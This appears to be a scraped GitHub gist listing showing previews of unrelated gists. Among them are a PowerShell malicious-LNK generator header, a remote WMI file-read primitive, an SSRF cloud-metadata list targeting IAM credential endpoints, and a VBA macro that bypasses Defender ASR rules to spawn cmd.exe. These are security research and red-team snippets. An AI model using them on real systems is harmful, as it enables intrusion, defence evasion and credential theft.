Skip to content

Instantly share code, notes, and snippets.

View epinna's full-sized avatar

Emilio epinna

1.1k followers · 152 following
  • London, United Kingdom
View GitHub Profile
@enigma0x3
enigma0x3 / Create-LNK.ps1
Created January 5, 2017 15:04
function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicous LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.
@cyrus-and
cyrus-and / README.md
Last active July 15, 2017 19:53 
$ ./hashall.py asd
BLAKE2s256  256  2521f2bce24415ca048d86e965b49e9c0695547dffe6b441cc48cfb0043e6157
blake2b512  512  e4139471a1800a05b5e02b56669f025d01e33c5655153a4faa29f694f7849c63f97577fcc3e397d1138cf4640e0c2053e74a7af646598310d076dc6f15d1af50
SHA256      256  688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6
SHA512      512  e54ee7e285fbb0275279143abc4c554e5314e7b417ecac83a5984a964facbaad68866a2841c3e83ddf125a2985566261c4014f9f960ec60253aebcda9513a9b4
blake2s256  256  2521f2bce24415ca048d86e965b49e9c0695547dffe6b441cc48cfb0043e6157
MD4         128  61118995d26bef582a59dec9220483e8
sha256      256  688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6
sha512      512  e54ee7e285fbb0275279143abc4c554e5314e7b417ecac83a5984a964facbaad68866a2841c3e83ddf125a2985566261c4014f9f960ec60253aebcda9513a9b4
@mattifestation
mattifestation / FileReadPrimitive.ps1
Last active June 12, 2023 16:33
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
@andresriancho
andresriancho / source-code-review-atom.md
Last active July 23, 2018 21:44
Ideas for source code review plugin for Atom

User story

As an application security expert I use Atom to read source code. I would like to be able to have a plugin with features that will help me identify vulnerabilities.

Ideas

  • Add annotations to the source code: Select a few lines of code, right click, "Add annotation", text box appears, user types comments on the source code, clicks "Save". All annotations can be seen in a tab. If the code has annotations then it is highlighted differently (change background color)

  • The plugin implements methods for searching for XSS, SQL injection, etc. The plugin adds a menu

@Neo23x0
Neo23x0 / audit.rules
Last active March 11, 2025 10:24
Linux Auditd Best Practice Configuration
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
# ___ ___ __ __
# / | __ ______/ (_) /_____/ /
# / /| |/ / / / __ / / __/ __ /
# / ___ / /_/ / /_/ / / /_/ /_/ /
# /_/ |_\__,_/\__,_/_/\__/\__,_/
@markwhat1
markwhat1 / Plex, usenet and torrent docker-compose file
Last active November 13, 2018 20:43 — forked from ajohnsen/Plex, Sonarr, Radarr, Jackett, OpenVPN+Transmission docker-compose file
Plex, NZBGet, Sonarr, Radarr, OpenVPN, Transmission, Jackett - docker-compose file
# to run: docker-compose run
#
# Create a .evn file in the same folder as this file and change the variables.
# MOUNT_POINT=/tmp/
# VPN_PROVIDER=changeme
# VPN_CONFIG=changeme
# VPN_USERNAME=changeme
# VPN_PASSWORD=changeme
#
#
@jhaddix
jhaddix / cloud_metadata.txt
Last active June 19, 2025 21:10 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@brianloveswords
brianloveswords / gif-from-tweet.md
Last active May 5, 2025 14:12

gif-from-tweet

There are so many great GIFs out there and I want to have copies of them. Twitter makes that harder than it should be by converting them to MP4 and not providing access to the source material. To make it easier, I made a bash pipeline that takes a tweet URL and a filename, extracts the MP4 from that tweet and uses ffmpeg to convert back to GIF.

Dependencies

  • ffmpeg
    • macOS: brew install ffmpeg
    • Ubuntu/Debian: apt install ffmpeg
@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active May 19, 2025 01:21
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub